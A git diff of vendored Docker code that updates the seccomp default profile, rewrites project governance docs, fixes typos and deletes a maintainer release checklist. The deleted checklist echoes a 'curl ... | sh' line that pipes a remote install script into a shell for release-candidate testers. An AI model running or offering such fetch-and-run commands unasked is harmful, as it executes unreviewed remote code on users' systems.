"sync", @@ -377,6 +379,28 @@ func DefaultProfile() *types.Seccomp { }, }, }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0x20000, + Op: types.OpEqualTo, + }, + }, + }, + { + Names: []string{"personality"}, + Action: types.ActAllow, + Args: []*types.Arg{ + { + Index: 0, + Value: 0x20008, + Op: types.OpEqualTo, + }, + }, + }, { Names: []string{"personality"}, Action: types.ActAllow, @@ -388,10 +412,21 @@ func DefaultProfile() *types.Seccomp { }, }, }, + { + Names: []string{ + "sync_file_range2", + }, + Action: types.ActAllow, + Args: []*types.Arg{}, + Includes: types.Filter{ + Arches: []string{"ppc64le"}, + }, + }, { Names: []string{ "arm_fadvise64_64", "arm_sync_file_range", + "sync_file_range2", "breakpoint", "cacheflush", "set_tls", @@ -453,6 +488,7 @@ func DefaultProfile() *types.Seccomp { "mount", "name_to_handle_at", "perf_event_open", + "quotactl", "setdomainname", "sethostname", "setns", @@ -474,7 +510,7 @@ func DefaultProfile() *types.Seccomp { Args: []*types.Arg{ { Index: 0, - Value: syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET, + Value: unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET, ValueTwo: 0, Op: types.OpMaskedEqual, }, @@ -492,7 +528,7 @@ func DefaultProfile() *types.Seccomp { Args: []*types.Arg{ { Index: 1, - Value: syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET, + Value: unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET, ValueTwo: 0, Op: types.OpMaskedEqual, }, @@ -576,7 +612,7 @@ func DefaultProfile() *types.Seccomp { Names: []string{ "settimeofday", "stime", - "adjtimex", + "clock_settime", }, Action: types.ActAllow, Args: []*types.Arg{}, diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go index 134692147b..b0b63ea811 100644 --- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go @@ -1,6 +1,6 @@ // +build linux -package seccomp +package seccomp // import "github.com/docker/docker/profiles/seccomp" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go index f84b20b6d9..67e06401f1 100644 --- a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go +++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go @@ -1,13 +1,12 @@ // +build linux,!seccomp -package seccomp +package seccomp // import "github.com/docker/docker/profiles/seccomp" import ( "github.com/docker/docker/api/types" - "github.com/opencontainers/runtime-spec/specs-go" ) // DefaultProfile returns a nil pointer on unsupported systems. -func DefaultProfile(rs *specs.Spec) *types.Seccomp { +func DefaultProfile() *types.Seccomp { return nil } diff --git a/vendor/github.com/docker/docker/project/ARM.md b/vendor/github.com/docker/docker/project/ARM.md index c4d21bf27a..c876231d1e 100644 --- a/vendor/github.com/docker/docker/project/ARM.md +++ b/vendor/github.com/docker/docker/project/ARM.md @@ -17,15 +17,15 @@ From the root of the Docker/Docker repo one can use make to execute the followin - make default - make shell - make test-unit -- make test-integration-cli +- make test-integration - make The Makefile does include logic to determine on which OS and architecture the Docker Development Image is built. Based on OS and architecture it chooses the correct Dockerfile. For the ARM 32bit architecture it uses `Dockerfile.armhf`. -So for example in order to build a Docker binary one has to -1. clone the Docker/Docker repository on an ARM device `git clone git@github.com:docker/docker.git` +So for example in order to build a Docker binary one has to: +1. clone the Docker/Docker repository on an ARM device `git clone https://github.com/docker/docker.git` 2. change into the checked out repository with `cd docker` 3. execute `make binary` to create a Docker Engine binary for ARM diff --git a/vendor/github.com/docker/docker/project/CONTRIBUTORS.md b/vendor/github.com/docker/docker/project/CONTRIBUTING.md similarity index 100% rename from vendor/github.com/docker/docker/project/CONTRIBUTORS.md rename to vendor/github.com/docker/docker/project/CONTRIBUTING.md diff --git a/vendor/github.com/docker/docker/project/GOVERNANCE.md b/vendor/github.com/docker/docker/project/GOVERNANCE.md index 6ae7baf743..4b52989a64 100644 --- a/vendor/github.com/docker/docker/project/GOVERNANCE.md +++ b/vendor/github.com/docker/docker/project/GOVERNANCE.md @@ -1,17 +1,120 @@ -# Docker Governance Advisory Board Meetings +# Moby project governance -In the spirit of openness, Docker created a Governance Advisory Board, and committed to make all materials and notes from the meetings of this group public. -All output from the meetings should be considered proposals only, and are subject to the review and approval of the community and the project leadership. +Moby projects are governed by the [Moby Technical Steering Committee (TSC)](https://github.com/moby/tsc). +See the Moby TSC [charter](https://github.com/moby/tsc/blob/master/README.md) for +further information on the role of the TSC and procedures for escalation +of technical issues or concerns. -The materials from the first Docker Governance Advisory Board meeting, held on October 28, 2014, are available at -[Google Docs Folder](https://goo.gl/Alfj8r) +Contact [any Moby TSC member](https://github.com/moby/tsc/blob/master/MEMBERS.md) with your questions/concerns about the governance or a specific technical +issue that you feel requires escalation. -These include: +## Project maintainers -* First Meeting Notes -* DGAB Charter -* Presentation 1: Introductory Presentation, including State of The Project -* Presentation 2: Overall Contribution Structure/Docker Project Core Proposal -* Presentation 3: Long Term Roadmap/Statement of Direction - +The current maintainers of the moby/moby repository are listed in the +[MAINTAINERS](/MAINTAINERS) file. +There are different types of maintainers, with different responsibilities, but +all maintainers have 3 things in common: + + 1. They share responsibility in the project's success. + 2. They have made a long-term, recurring time investment to improve the project. + 3. They spend that time doing whatever needs to be done, not necessarily what is the most interesting or fun. + +Maintainers are often under-appreciated, because their work is less visible. +It's easy to recognize a really cool and technically advanced feature. It's harder +to appreciate the absence of bugs, the slow but steady improvement in stability, +or the reliability of a release process. But those things distinguish a good +project from a great one. + +### Adding maintainers + +Maintainers are first and foremost contributors who have shown their +commitment to the long term success of a project. Contributors who want to +become maintainers first demonstrate commitment to the project by contributing +code, reviewing others' work, and triaging issues on a regular basis for at +least three months. + +The contributions alone don't make you a maintainer. You need to earn the +trust of the current maintainers and other project contributors, that your +decisions and actions are in the best interest of the project. + +Periodically, the existing maintainers curate a list of contributors who have +shown regular activity on the project over the prior months. From this +list, maintainer candidates are selected and proposed on the maintainers +mailing list. + +After a candidate is announced on the maintainers mailing list, the +existing maintainers discuss the candidate over the next 5 business days, +provide feedback, and vote. At least 66% of the current maintainers must +vote in the affirmative. + +If a candidate is approved, a maintainer contacts the candidate to +invite them to open a pull request that adds the contributor to +the MAINTAINERS file. The candidate becomes a maintainer once the pull +request is merged. + +### Removing maintainers + +Maintainers can be removed from the project, either at their own request +or due to [project inactivity](#inactive-maintainer-policy). + +#### How to step down + +Life priorities, interests, and passions can change. If you're a maintainer but +feel you must remove yourself from the list, inform other maintainers that you +intend to step down, and if possible, help find someone to pick up your work. +At the very least, ensure your work can be continued where you left off. + +After you've informed other maintainers, create a pull request to remove +yourself from the MAINTAINERS file. + +#### Inactive maintainer policy + +An existing maintainer can be removed if they do not show significant activity +on the project. Periodically, the maintainers review the list of maintainers +and their activity over the last three months. + +If a maintainer has shown insufficient activity over this period, a project +representative will contact the maintainer to ask if they want to continue +being a maintainer. If the maintainer decides to step down as a maintainer, +they open a pull request to be removed from the MAINTAINERS file. + +If the maintainer wants to continue in this role, but is unable to perform the +required duties, they can be removed with a vote by at least 66% of the current +maintainers. The maintainer under discussion will not be allowed to vote. An +e-mail is sent to the mailing list, inviting maintainers of the project to +vote. The voting period is five business days. Issues related to a maintainer's +performance should be discussed with them among the other maintainers so that +they are not surprised by a pull request removing them. This discussion should +be handled objectively with no ad hominem attacks. + +## Project decision making + +Short answer: **Everything is a pull request**. + +The Moby core engine project is an open-source project with an open design +philosophy. This means that the repository is the source of truth for **every** +aspect of the project, including its philosophy, design, road map, and APIs. +*If it's part of the project, it's in the repo. If it's in the repo, it's part +of the project.* + +As a result, each decision can be expressed as a change to the repository. An +implementation change is expressed as a change to the source code. An API +change is a change to the API specification. A philosophy change is a change +to the philosophy manifesto, and so on. + +All decisions affecting the moby/moby repository, both big and small, follow +the same steps: + + * **Step 1**: Open a pull request. Anyone can do this. + + * **Step 2**: Discuss the pull request. Anyone can do this. + + * **Step 3**: Maintainers merge, close or reject the pull request. + +Pull requests are reviewed by the current maintainers of the moby/moby +repository. Weekly meetings are organized to are organized to synchronously +discuss tricky PRs, as well as design and architecture decisions.. When +technical agreement cannot be reached among the maintainers of the project, +escalation or concerns can be raised by opening an issue to be handled +by the [Moby Technical Steering Committee](https://github.com/moby/tsc). diff --git a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md index 95cb2f1b95..5ef2d317ea 100644 --- a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md +++ b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md @@ -30,7 +30,7 @@ reopened when the necessary information is provided. ### 2. Classify the Issue -An issue can have multiple of the following labels. Typically, a properly classified issues should +An issue can have multiple of the following labels. Typically, a properly classified issue should have: - One label identifying its kind (`kind/*`). @@ -42,7 +42,7 @@ have: | Kind | Description | |------------------|---------------------------------------------------------------------------------------------------------------------------------| | kind/bug | Bugs are bugs. The cause may or may not be known at triage time so debugging should be taken account into the time estimate. | -| kind/enhancement | Enhancement are not bugs or new features but can drastically improve usability or performance of a project component. | +| kind/enhancement | Enhancements are not bugs or new features but can drastically improve usability or performance of a project component. | | kind/feature | Functionality or other elements that the project does not currently support. Features are new and shiny. | | kind/question | Contains a user or contributor question requiring a response. | @@ -129,4 +129,4 @@ following labels to indicate their degree of priority (from more urgent to less | priority/P2 | Normal priority: default priority applied. | | priority/P3 | Best effort: those are nice to have / minor issues. | -And that's it. That should be all the information required for a new or existing contributor to come in an resolve an issue. +And that's it. That should be all the information required for a new or existing contributor to come in a resolve an issue. diff --git a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md index 3763f8798b..458384a3d9 100644 --- a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md +++ b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md @@ -30,7 +30,7 @@ docker run --rm -it --privileged \ Sh\*t happens. We know. Below are steps to get out of any "hash-sum mismatch" or "gpg sig error" or the likes error that might happen to the apt repo. -**NOTE:** These are apt repo specific, have had no experimence with anything similar +**NOTE:** These are apt repo specific, have had no experience with anything similar happening to the yum repo in the past so you can rest easy. For each step listed below, move on to the next if the previous didn't work. diff --git a/vendor/github.com/docker/docker/project/PACKAGERS.md b/vendor/github.com/docker/docker/project/PACKAGERS.md index 46ea8e7b20..a5b0018b5a 100644 --- a/vendor/github.com/docker/docker/project/PACKAGERS.md +++ b/vendor/github.com/docker/docker/project/PACKAGERS.md @@ -292,7 +292,7 @@ appropriate for your distro's init script to live there too!). In general, Docker should be run as root, similar to the following: ```bash -docker daemon +dockerd ``` Generally, a `DOCKER_OPTS` variable of some kind is available for adding more diff --git a/vendor/github.com/docker/docker/project/README.md b/vendor/github.com/docker/docker/project/README.md index 3ed68cf297..0eb5e5890f 100644 --- a/vendor/github.com/docker/docker/project/README.md +++ b/vendor/github.com/docker/docker/project/README.md @@ -5,7 +5,7 @@ distributing Docker, specifically: ## Guides -If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTORS.md](../CONTRIBUTING.md). +If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTING.md](../CONTRIBUTING.md). If you're a *maintainer* or aspiring maintainer, you should read [MAINTAINERS](../MAINTAINERS). diff --git a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md deleted file mode 100644 index 84848cae2b..0000000000 --- a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md +++ /dev/null @@ -1,518 +0,0 @@ -# Release Checklist -## A maintainer's guide to releasing Docker - -So you're in charge of a Docker release? Cool. Here's what to do. - -If your experience deviates from this document, please document the changes -to keep it up-to-date. - -It is important to note that this document assumes that the git remote in your -repository that corresponds to "https://github.com/docker/docker" is named -"origin". If yours is not (for example, if you've chosen to name it "upstream" -or something similar instead), be sure to adjust the listed snippets for your -local environment accordingly. If you are not sure what your upstream remote is -named, use a command like `git remote -v` to find out. - -If you don't have an upstream remote, you can add one easily using something -like: - -```bash -export GITHUBUSER="YOUR_GITHUB_USER" -git remote add origin https://github.com/docker/docker.git -git remote add $GITHUBUSER git@github.com:$GITHUBUSER/docker.git -``` - -### 1. Pull from master and create a release branch - -All releases version numbers will be of the form: vX.Y.Z where X is the major -version number, Y is the minor version number and Z is the patch release version number. - -#### Major releases - -The release branch name is just vX.Y because it's going to be the basis for all .Z releases. - -```bash -export BASE=vX.Y -export VERSION=vX.Y.Z -git fetch origin -git checkout --track origin/master -git checkout -b release/$BASE -``` - -This new branch is going to be the base for the release. We need to push it to origin so we -can track the cherry-picked changes and the version bump: - -```bash -git push origin release/$BASE -``` - -When you have the major release branch in origin, we need to create the bump fork branch -that we'll push to our fork: - -```bash -git checkout -b bump_$VERSION -``` - -#### Patch releases - -If we have the release branch in origin, we can create the forked bump branch from it directly: - -```bash -export VERSION=vX.Y.Z -export PATCH=vX.Y.Z+1 -git fetch origin -git checkout --track origin/release/$BASE -git checkout -b bump_$PATCH -``` - -We cherry-pick only the commits we want into the bump branch: - -```bash -# get the commits ids we want to cherry-pick -git log -# cherry-pick the commits starting from the oldest one, without including merge commits -git cherry-pick -s -x -git cherry-pick -s -x -... -``` - -### 2. Update the VERSION files and API version on master - -We don't want to stop contributions to master just because we are releasing. -So, after the release branch is up, we bump the VERSION and API version to mark -the start of the "next" release. - -#### 2.1 Update the VERSION files - -Update the content of the `VERSION` file to be the next minor (incrementing Y) -and add the `-dev` suffix. For example, after the release branch for 1.5.0 is -created, the `VERSION` file gets updated to `1.6.0-dev` (as in "1.6.0 in the -making"). - -#### 2.2 Update API version on master - -We don't want API changes to go to the now frozen API version. Create a new -entry in `docs/reference/api/` by copying the latest and bumping the version -number (in both the file's name and content), and submit this in a PR against -master. - -### 3. Update CHANGELOG.md - -You can run this command for reference with git 2.0: - -```bash -git fetch --tags -LAST_VERSION=$(git tag -l --sort=-version:refname "v*" | grep -E 'v[0-9\.]+$' | head -1) -git log --stat $LAST_VERSION..bump_$VERSION -``` - -If you don't have git 2.0 but have a sort command that supports `-V`: -```bash -git fetch --tags -LAST_VERSION=$(git tag -l | grep -E 'v[0-9\.]+$' | sort -rV | head -1) -git log --stat $LAST_VERSION..bump_$VERSION -``` - -If releasing a major version (X or Y increased in vX.Y.Z), simply listing notable user-facing features is sufficient. -```markdown -#### Notable features since -* New docker command to do something useful -* Engine API change (deprecating old version) -* Performance improvements in some usecases -* ... -``` - -For minor releases (only Z increases in vX.Y.Z), provide a list of user-facing changes. -Each change should be listed under a category heading formatted as `#### CATEGORY`. - -`CATEGORY` should describe which part of the project is affected. - Valid categories are: - * Builder - * Documentation - * Hack - * Packaging - * Engine API - * Runtime - * Other (please use this category sparingly) - -Each change should be formatted as `BULLET DESCRIPTION`, given: - -* BULLET: either `-`, `+` or `*`, to indicate a bugfix, new feature or - upgrade, respectively. - -* DESCRIPTION: a concise description of the change that is relevant to the - end-user, using the present tense. Changes should be described in terms - of how they affect the user, for example "Add new feature X which allows Y", - "Fix bug which caused X", "Increase performance of Y". - -EXAMPLES: - -```markdown -## 0.3.6 (1995-12-25) - -#### Builder - -+ 'docker build -t FOO .' applies the tag FOO to the newly built image - -#### Engine API - -- Fix a bug in the optional unix socket transport - -#### Runtime - -* Improve detection of kernel version -``` - -If you need a list of contributors between the last major release and the -current bump branch, use something like: -```bash -git log --format='%aN <%aE>' v0.7.0...bump_v0.8.0 | sort -uf -``` -Obviously, you'll need to adjust version numbers as necessary. If you just need -a count, add a simple `| wc -l`. - -### 4. Change the contents of the VERSION file - -Before the big thing, you'll want to make successive release candidates and get -people to test. The release candidate number `N` should be part of the version: - -```bash -export RC_VERSION=${VERSION}-rcN -echo ${RC_VERSION#v} > VERSION -``` - -### 5. Test the docs - -Make sure that your tree includes documentation for any modified or -new features, syntax or semantic changes. - -To test locally: - -```bash -make docs -``` - -To make a shared test at https://beta-docs.docker.io: - -(You will need the `awsconfig` file added to the `docs/` dir) - -```bash -make AWS_S3_BUCKET=beta-docs.docker.io BUILD_ROOT=yes docs-release -``` - -### 6. Commit and create a pull request to the "release" branch - -```bash -git add VERSION CHANGELOG.md -git commit -m "Bump version to $VERSION" -git push $GITHUBUSER bump_$VERSION -echo "https://github.com/$GITHUBUSER/docker/compare/docker:release/$BASE...$GITHUBUSER:bump_$VERSION?expand=1" -``` - -That last command will give you the proper link to visit to ensure that you -open the PR against the "release" branch instead of accidentally against -"master" (like so many brave souls before you already have). - -### 7. Create a PR to update the AUTHORS file for the release - -Update the AUTHORS file, by running the `hack/generate-authors.sh` on the -release branch. To prevent duplicate entries, you may need to update the -`.mailmap` file accordingly. - -### 8. Build release candidate rpms and debs - -**NOTE**: It will be a lot faster if you pass a different graphdriver with -`DOCKER_GRAPHDRIVER` than `vfs`. - -```bash -docker build -t docker . -docker run \ - --rm -t --privileged \ - -e DOCKER_GRAPHDRIVER=aufs \ - -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ - docker \ - hack/make.sh binary build-deb build-rpm -``` - -### 9. Publish release candidate rpms and debs - -With the rpms and debs you built from the last step you can release them on the -same server, or ideally, move them to a dedicated release box via scp into -another docker/docker directory in bundles. This next step assumes you have -a checkout of the docker source code at the same commit you used to build, with -the artifacts from the last step in `bundles`. - -**NOTE:** If you put a space before the command your `.bash_history` will not -save it. (for the `GPG_PASSPHRASE`). - -```bash -docker build -t docker . -docker run --rm -it --privileged \ - -v /volumes/repos:/volumes/repos \ - -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ - -v $HOME/.gnupg:/root/.gnupg \ - -e DOCKER_RELEASE_DIR=/volumes/repos \ - -e GPG_PASSPHRASE \ - -e KEEPBUNDLE=1 \ - docker \ - hack/make.sh release-deb release-rpm sign-repos generate-index-listing -``` - -### 10. Upload the changed repos to wherever you host - -For example, above we bind mounted `/volumes/repos` as the storage for -`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with -a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with -a s3 bucket for the yum repo. - -### 11. Publish release candidate binaries - -To run this you will need access to the release credentials. Get them from the -Core maintainers. - -```bash -docker build -t docker . - -# static binaries are still pushed to s3 -docker run \ - -e AWS_S3_BUCKET=test.docker.com \ - -e AWS_ACCESS_KEY_ID \ - -e AWS_SECRET_ACCESS_KEY \ - -e AWS_DEFAULT_REGION \ - -i -t --privileged \ - docker \ - hack/release.sh -``` - -It will run the test suite, build the binaries and upload to the specified bucket, -so this is a good time to verify that you're running against **test**.docker.com. - -### 12. Purge the cache! - -After the binaries are uploaded to test.docker.com and the packages are on -apt.dockerproject.org and yum.dockerproject.org, make sure -they get tested in both Ubuntu and Debian for any obvious installation -issues or runtime issues. - -If everything looks good, it's time to create a git tag for this candidate: - -```bash -git tag -a $RC_VERSION -m $RC_VERSION bump_$VERSION -git push origin $RC_VERSION -``` - -Announcing on multiple medias is the best way to get some help testing! An easy -way to get some useful links for sharing: - -```bash -echo "Ubuntu/Debian: curl -sSL https://test.docker.com/ | sh" -echo "Linux 64bit binary: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}" -echo "Darwin/OSX 64bit client binary: https://test.docker.com/builds/Darwin/x86_64/docker-${VERSION#v}" -echo "Linux 64bit tgz: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}.tgz" -echo "Windows 64bit client binary: https://test.docker.com/builds/Windows/x86_64/docker-${VERSION#v}.exe" -echo "Windows 32bit client binary: https://test.docker.com/builds/Windows/i386/docker-${VERSION#v}.exe" -``` - -We recommend announcing the release candidate on: - -- IRC on #docker, #docker-dev, #docker-maintainers -- In a comment on the pull request to notify subscribed people on GitHub -- The [docker-dev](https://groups.google.com/forum/#!forum/docker-dev) group -- The [docker-maintainers](https://groups.google.com/a/dockerproject.org/forum/#!forum/maintainers) group -- Any social media that can bring some attention to the release candidate - -### 13. Iterate on successive release candidates - -Spend several days along with the community explicitly investing time and -resources to try and break Docker in every possible way, documenting any -findings pertinent to the release. This time should be spent testing and -finding ways in which the release might have caused various features or upgrade -environments to have issues, not coding. During this time, the release is in -code freeze, and any additional code changes will be pushed out to the next -release. - -It should include various levels of breaking Docker, beyond just using Docker -by the book. - -Any issues found may still remain issues for this release, but they should be -documented and give appropriate warnings. - -During this phase, the `bump_$VERSION` branch will keep evolving as you will -produce new release candidates. The frequency of new candidates is up to the -release manager: use your best judgement taking into account the severity of -reported issues, testers availability, and time to scheduled release date. - -Each time you'll want to produce a new release candidate, you will start by -adding commits to the branch, usually by cherry-picking from master: - -```bash -git cherry-pick -s -x -m0 -``` - -You want your "bump commit" (the one that updates the CHANGELOG and VERSION -files) to remain on top, so you'll have to `git rebase -i` to bring it back up. - -Now that your bump commit is back on top, you will need to update the CHANGELOG -file (if appropriate for this particular release candidate), and update the -VERSION file to increment the RC number: - -```bash -export RC_VERSION=$VERSION-rcN -echo $RC_VERSION > VERSION -``` - -You can now amend your last commit and update the bump branch: - -```bash -git commit --amend -git push -f $GITHUBUSER bump_$VERSION -``` - -Repeat step 6 to tag the code, publish new binaries, announce availability, and -get help testing. - -### 14. Finalize the bump branch - -When you're happy with the quality of a release candidate, you can move on and -create the real thing. - -You will first have to amend the "bump commit" to drop the release candidate -suffix in the VERSION file: - -```bash -echo $VERSION > VERSION -git add VERSION -git commit --amend -``` - -You will then repeat step 6 to publish the binaries to test - -### 15. Get 2 other maintainers to validate the pull request - -### 16. Build final rpms and debs - -```bash -docker build -t docker . -docker run \ - --rm -t --privileged \ - -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ - docker \ - hack/make.sh binary build-deb build-rpm -``` - -### 17. Publish final rpms and debs - -With the rpms and debs you built from the last step you can release them on the -same server, or ideally, move them to a dedicated release box via scp into -another docker/docker directory in bundles. This next step assumes you have -a checkout of the docker source code at the same commit you used to build, with -the artifacts from the last step in `bundles`. - -**NOTE:** If you put a space before the command your `.bash_history` will not -save it. (for the `GPG_PASSPHRASE`). - -```bash -docker build -t docker . -docker run --rm -it --privileged \ - -v /volumes/repos:/volumes/repos \ - -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ - -v $HOME/.gnupg:/root/.gnupg \ - -e DOCKER_RELEASE_DIR=/volumes/repos \ - -e GPG_PASSPHRASE \ - -e KEEPBUNDLE=1 \ - docker \ - hack/make.sh release-deb release-rpm sign-repos generate-index-listing -``` - -### 18. Upload the changed repos to wherever you host - -For example, above we bind mounted `/volumes/repos` as the storage for -`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with -a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with -a s3 bucket for the yum repo. - -### 19. Publish final binaries - -Once they're tested and reasonably believed to be working, run against -get.docker.com: - -```bash -docker build -t docker . -# static binaries are still pushed to s3 -docker run \ - -e AWS_S3_BUCKET=get.docker.com \ - -e AWS_ACCESS_KEY_ID \ - -e AWS_SECRET_ACCESS_KEY \ - -e AWS_DEFAULT_REGION \ - -i -t --privileged \ - docker \ - hack/release.sh -``` - -### 20. Purge the cache! - -### 21. Apply tag and create release - -It's very important that we don't make the tag until after the official -release is uploaded to get.docker.com! - -```bash -git tag -a $VERSION -m $VERSION bump_$VERSION -git push origin $VERSION -``` - -Once the tag is pushed, go to GitHub and create a [new release](https://github.com/docker/docker/releases/new). -If the tag is for an RC make sure you check `This is a pre-release` at the bottom of the form. - -Select the tag that you just pushed as the version and paste the changelog in the description of the release. -You can see examples in this two links: - -https://github.com/docker/docker/releases/tag/v1.8.0 -https://github.com/docker/docker/releases/tag/v1.8.0-rc3 - -### 22. Go to github to merge the `bump_$VERSION` branch into release - -Don't forget to push that pretty blue button to delete the leftover -branch afterwards! - -### 23. Update the docs branch - -You will need to point the docs branch to the newly created release tag: - -```bash -git checkout origin/docs -git reset --hard origin/$VERSION -git push -f origin docs -``` - -The docs will appear on https://docs.docker.com/ (though there may be cached -versions, so its worth checking http://docs.docker.com.s3-website-us-east-1.amazonaws.com/). -For more information about documentation releases, see `docs/README.md`. - -Note that the new docs will not appear live on the site until the cache (a complex, -distributed CDN system) is flushed. The `make docs-release` command will do this -_if_ the `DISTRIBUTION_ID` is set correctly - this will take at least 15 minutes to run -and you can check its progress with the CDN Cloudfront Chrome addon. - -### 24. Create a new pull request to merge your bump commit back into master - -```bash -git checkout master -git fetch -git reset --hard origin/master -git cherry-pick -s -x $VERSION -git push $GITHUBUSER merge_release_$VERSION -echo "https://github.com/$GITHUBUSER/docker/compare/docker:master...$GITHUBUSER:merge_release_$VERSION?expand=1" -``` - -Again, get two maintainers to validate, then merge, then push that pretty -blue button to delete your branch. - -### 25. Rejoice and Evangelize! - -Congratulations! You're done. - -Go forth and announce the glad tidings of the new release in `#docker`, -`#docker-dev`, on the [dev mailing list](https://groups.google.com/forum/#!forum/docker-dev), -the [announce mailing list](https://groups.google.com/forum/#!forum/docker-announce), -and on Twitter! diff --git a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md index d764e9d007..8270a6efb3 100644 --- a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md +++ b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md @@ -45,7 +45,7 @@ defined by a ROADMAP.md file at the root of the repository). - The earlier a PR is opened, the more time the maintainers have to review. For example, if a PR is opened the day before the freeze date, it’s very unlikely that it will be merged for the release. -- Constant communication with the maintainers (mailing-list, IRC, Github issues, +- Constant communication with the maintainers (mailing-list, IRC, GitHub issues, etc.) allows to get early feedback on the design before getting into the implementation, which usually reduces the time needed to discuss a changeset. - If the code is commented, fully tested and by extension follows every single diff --git a/vendor/github.com/docker/docker/project/REVIEWING.md b/vendor/github.com/docker/docker/project/REVIEWING.md index 51ef4c59de..cac3f5d7d4 100644 --- a/vendor/github.com/docker/docker/project/REVIEWING.md +++ b/vendor/github.com/docker/docker/project/REVIEWING.md @@ -68,7 +68,7 @@ the next appropriate stage: - Has DCO - Contains sufficient justification (e.g., usecases) for the proposed change - - References the Github issue it fixes (if any) in the commit or the first Github comment + - References the GitHub issue it fixes (if any) in the commit or the first GitHub comment Possible transitions from this state: diff --git a/vendor/github.com/docker/docker/project/TOOLS.md b/vendor/github.com/docker/docker/project/TOOLS.md index 26303c3021..dda0fc0342 100644 --- a/vendor/github.com/docker/docker/project/TOOLS.md +++ b/vendor/github.com/docker/docker/project/TOOLS.md @@ -17,7 +17,7 @@ GitHub pull requests. Leeroy uses [GitHub hooks](https://developer.github.com/v3/repos/hooks/) to listen for pull request notifications and starts jobs on your Jenkins server. Using the Jenkins -[notification plugin][https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin], +[notification plugin](https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin), Leeroy updates the pull request using GitHub's [status API](https://developer.github.com/v3/repos/statuses/) with pending, success, failure, or error statuses. diff --git a/vendor/github.com/docker/docker/reference/errors.go b/vendor/github.com/docker/docker/reference/errors.go new file mode 100644 index 0000000000..2d294c672e --- /dev/null +++ b/vendor/github.com/docker/docker/reference/errors.go @@ -0,0 +1,25 @@ +package reference // import "github.com/docker/docker/reference" + +type notFoundError string + +func (e notFoundError) Error() string { + return string(e) +} + +func (notFoundError) NotFound() {} + +type invalidTagError string + +func (e invalidTagError) Error() string { + return string(e) +} + +func (invalidTagError) InvalidParameter() {} + +type conflictingTagError string + +func (e conflictingTagError) Error() string { + return string(e) +} + +func (conflictingTagError) Conflict() {} diff --git a/vendor/github.com/docker/docker/reference/reference.go b/vendor/github.com/docker/docker/reference/reference.go deleted file mode 100644 index 996fc50704..0000000000 --- a/vendor/github.com/docker/docker/reference/reference.go +++ /dev/null @@ -1,216 +0,0 @@ -package reference - -import ( - "errors" - "fmt" - "strings" - - "github.com/docker/distribution/digest" - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/image/v1" -) - -const ( - // DefaultTag defines the default tag used when performing images related actions and no tag or digest is specified - DefaultTag = "latest" - // DefaultHostname is the default built-in hostname - DefaultHostname = "docker.io" - // LegacyDefaultHostname is automatically converted to DefaultHostname - LegacyDefaultHostname = "index.docker.io" - // DefaultRepoPrefix is the prefix used for default repositories in default host - DefaultRepoPrefix = "library/" -) - -// Named is an object with a full name -type Named interface { - // Name returns normalized repository name, like "ubuntu". - Name() string - // String returns full reference, like "ubuntu@sha256:abcdef..." - String() string - // FullName returns full repository name with hostname, like "docker.io/library/ubuntu" - FullName() string - // Hostname returns hostname for the reference, like "docker.io" - Hostname() string - // RemoteName returns the repository component of the full name, like "library/ubuntu" - RemoteName() string -} - -// NamedTagged is an object including a name and tag. -type NamedTagged interface { - Named - Tag() string -} - -// Canonical reference is an object with a fully unique -// name including a name with hostname and digest -type Canonical interface { - Named - Digest() digest.Digest -} - -// ParseNamed parses s and returns a syntactically valid reference implementing -// the Named interface. The reference must have a name, otherwise an error is -// returned. -// If an error was encountered it is returned, along with a 